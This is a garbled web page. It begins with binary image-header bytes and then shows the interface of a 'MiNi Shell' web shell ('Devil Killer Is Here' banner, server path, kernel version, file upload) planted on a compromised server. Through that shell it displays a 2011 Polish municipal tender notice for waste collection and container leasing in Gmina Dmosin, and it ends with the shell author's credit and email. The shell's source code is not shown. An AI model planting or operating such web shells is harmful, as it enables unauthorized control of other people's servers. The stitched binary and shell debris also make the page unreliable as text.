JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111222/343003-N-2011.html

<p class="kh_header"><b>Dmosin: Wywóz nieczystości stałych wraz z dzierżawą pojemników z terenu Gminy Dmosin</b><br>
<b>Numer ogłoszenia: 343003 - 2011; data zamieszczenia: 22.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dmosin , Dmosin 9, 95-061 Dmosin, woj. łódzkie, tel. 046 8747485, faks 046 8746294.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dmosin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz nieczystości stałych wraz z dzierżawą pojemników z terenu Gminy Dmosin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest 
-Wywóz nieczystości stałych wraz z dzierżawą pojemników z terenu Gminy Dmosin-
2. Opis przedmiotu zamówienia: Przedmiotem zamówienia jest wywóz nieczystości stałych wraz z oddaniem w dzierżawę  pojemników do gromadzenia odpadów komunalnych oraz ich ustawienie w wyznaczonych miejscach.
2.1. Szczegółowy opis przedmiotu zamówienia:
1)oddania w dzierżawę i ustawienia w wyznaczonych miejscach pojemników 
do gromadzenia odpadów komunalnych:
1.1) w ilości 5 sztuk o pojemności 5 m3  pojemniki ustawione będą na terenie nieruchomości, na których zlokalizowane są :
-Urząd Gminy Dmosin , Dmosin 9 , - 2 sztuki, 
-Ośrodek Zdrowia w Nagawkach,  Nagawki 16 - 1 sztuka,
-Zespół Szkół Samorządowych w Dmosinie , Dmosin 1c - 2 sztuki
 1.2) w ilości 3 sztuk o pojemności 1,1m3, pojemniki ustawione będą na terenie  nieruchomości , na których zlokalizowane są:
- Szkoła Podstawowa  w Kołacinie , Kołacin   2 szt.
- Świetlica Środowiskowa w Dmosinie (przy kościele) 1 szt.
1.3) w ilości  1 sztuka 240 litrów  pojemnik ustawiony będzie na terenie nieruchomości, na których zlokalizowane są:
- Szkoła podstawowa w Woli Cytrusowej.

2) odbierania odpadów komunalnych w ilości szacunkowej 400 m3
1.1) z pojemników, o których mowa w pkt. 2.1. p.pkt. 1)
1.2) z pojemników będących własnością Gminy Dmosin ustawionych na terenie  nieruchomości, na których zlokalizowane są:
- Zespół Boisk Sportowych w Dmosinie Drugim pojemnik o poj. 120 litrów -2 szt.
- Świetlica Środowiskowa w Nagawkach, Nagawki pojemnik o poj. 1,1 m3
3) oddania w dzierżawę i ustawienia w wyznaczonych miejscach pojemników do gromadzenia odpadów komunalnych: 
3.1) w ilości 4 szt. o pojemności 120 litrów wraz z wywozem odpadów z tych pojemników, pojemniki ustawione będą na terenie  nieruchomości, na których zlokalizowane są:
-Ochotnicza Straż Pożarna w Kraszewie- 1 szt. 
-Ochotnicza Straż Pożarna w Kołacinku - 1 szt.
-Świetlica środowiskowa w Osinach - 1 szt.
-Ochotnicza Straż Pożarna w Nowostawach Dolnych - 1 szt.
4)ustawienia w wyznaczonych przez Zleceniodawcę miejscach pojemników specjalistycznych typu siatka oraz wywozu z zapełnionych pojemników specjalistycznych typu  siatka w ilości 13 sztuk odpadów stałych gromadzonych selektywnie w postaci tworzywa sztucznego znajdujących się w:
-Kołacinie przy sklepie G.S. ,( SCh)  szt. 1,
-Woli Cyrusowej przy starym budynku strażnicy OSP szt. 1,
-Kraszewie przy sklepie G.S. ,(SCh) szt. 1,
-Dmosinie przy Spółdzielni Kółek Rolniczych - sklep G.S. ,(SCh)   szt. 1,
-Dmosinie przy budynku Urzędu Gminy szt. 1,
-Lubowidzy przy byłym sklepie G.S. , (SCh)  szt.1,
-Ząbkach przy budynku OSP szt. 1,
-Osinach osiedle po byłym PGO szt. 1,
-Dmosinie przy Szkole Podstawowej szt. 1,
-Szczecinie przy sklepie szt.1,
-Kołacinie (osiedle po byłym PGR) szt.1,
-Nowostawach Dolnych szt.1,

5)ustawienia w wyznaczonych przez Zleceniodawcę miejscach pojemników specjalistycznych na składowanie szkła białego i kolorowego (tj: typu DZWON) oraz wywozu z zapełnionych pojemników specjalistycznych na składowanie szkła białego i kolorowego w ilości 18 sztuk,  odpadów stałych gromadzonych selektywnie w postaci szkła kolorowego i szkła białego znajdujących się w :
-Kołacinie przy sklepie G.S. ,(SCh),  szt. 2 (szkło białe szt.1 i szkło kolorowe szt.1),
-Woli Cyrusowej przy starym budynku strażnicy OSP szt. 2 (szkło białe szt.1 i szkło kolorowe szt.1),
-Kraszewie przy sklepie G.S. ,(SCh), szt. 2 (szkło białe szt.1 i szkło kolorowe szt.1),
-Dmosinie przy budynku strażnicy OSP szt. 2 (szkło białe szt. 1 i szkło kolorowe szt.1),
-Szczecin przy sklepie szt. 2 (szkło białe szt. 1 i szkło kolorowe szt. 1),
-Osiny osiedle po byłym PGO szt. 2 (szkło białe szt.1 i szkło kolorowe szt. 1),
-Ząbkach przy sklepie szt. 2 (szkło białe szt.1 i szkło kolorowe szt.1),
-Kołacinie osiedle przy byłym PGR szt. 2 (szkło białe szt. 1 i szkło kolorowe szt.1)
-Nowostawach Dolnych szt. 2 (szkło białe szt.1 i szkło kolorowe szt.1)  

6) Odbiór  transport i zagospodarowanie odpadów pochodzących z oczyszczalni ścieków komunalnych w Dmosinie Drugim w następującym zakresie:
- oddanie w dzierżawę i ustawienie w wyznaczonym miejscu na terenie oczyszczalni ścieków  pojemnika w ilości 1 sztuka  o pojemności 7m3 w wersji zamkniętej do gromadzenia odpadów komunalnych o kodzie 19.08.05 -  ustabilizowane komunalne osady ściekowe - wraz z odbiorem odpadów 2 razy w roku w ilości szacunkowej 10 ton w okresie zamówienia. 
- odbiór odpadów o kodzie 19 08 01 - skratki - z kontenera KP-7 będącego własnością Gminy Dmosin oraz zwrot - odwóz kontenera na nieruchomość na której zlokalizowana jest oczyszczalnia ścieków w Dmosinie Drugim - odbiór odpadów 2 razy w roku w ilości szacunkowej 10 ton w okresie zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.37.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że warunek został spełniony jeżeli wykonawca złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że warunek został spełniony jeżeli wykonawca złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że warunek został spełniony jeżeli wykonawca złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że warunek został spełniony jeżeli wykonawca złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że warunek został spełniony jeżeli wykonawca złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia umowne zawiera wzór umowy załączony do SIWZ ( załącznik nr 6)
2.Zamawiający  - na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych - zastrzega sobie prawo do zmiany treści umowy wskutek wystąpienia okoliczności, których nie dało się przewidzieć na etapie postępowania o udzielenie zamówienia i na etapie podpisywania umowy lub wystąpienie których nie zależy od woli stron umowy w sprawie zamówienia publicznego, albo zmiany te są korzystne dla zamawiającego.
3.W szczególności Zamawiający ustanawia następujące warunki umożliwiające zmianę i zakres treści umowy:
a) wystąpienie warunków atmosferycznych i zdarzeń losowych, które istotnie utrudniają lub uniemożliwiają wykonanie usług w umówiony sposób, dopuszcza się możliwość przedłużenia terminu wykonania zamówienia i innych terminów umownych

b)  w przypadku usług zamiennych możliwość zmiany umówionego wynagrodzenia wynikającej z porównania rozmiaru i wartości usług zamiennych z usługami pierwotnie zamówionymi z zastrzeżeniem nieprzekraczalności ceny ofertowej, która będzie stanowić maksymalną graniczną kwotę umówionego wynagrodzenia.  

c) dopuszcza się możliwość zwiększenia i zmniejszenia ilości zamówionych usług z zastrzeżeniem nieprzekraczalności ceny ofertowej, która będzie stanowić maksymalną graniczną kwotę umówionego wynagrodzenia.  W przypadku zmniejszenia usług zmniejszone zostanie odpowiednio wynagrodzenie.

d) wystąpienie konieczności zlecenia zamówień dodatkowych na podstawie art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, od których zależy należyte wykonanie przedmiotu zamówienia, dopuszcza się możliwość przedłużenia terminu wykonania zamówienia i innych terminów umownych

e)  Cena za wykonanie całego przedmiotu zamówienia jak i poszczególnych usług może ulec zmianie w przypadku gdy stawka podatku od towarów i usług VAT zostanie ustawowo zmieniona. 
W takim przypadku do ceny netto zostanie naliczony podatek VAT w obowiązującej wysokości.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dmosin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiajacego w Urzędzie Gminy w Dmosinie , Dmosin 9, 95-061 Dmosin, pokój nr 15a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2011 godzina 10:00, miejsce: W siedzibie Zamawiającegow Urzędzie Gminy w Dmosinie, Dmosin 9, 95-061 Dmosin , pokój nr 15a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com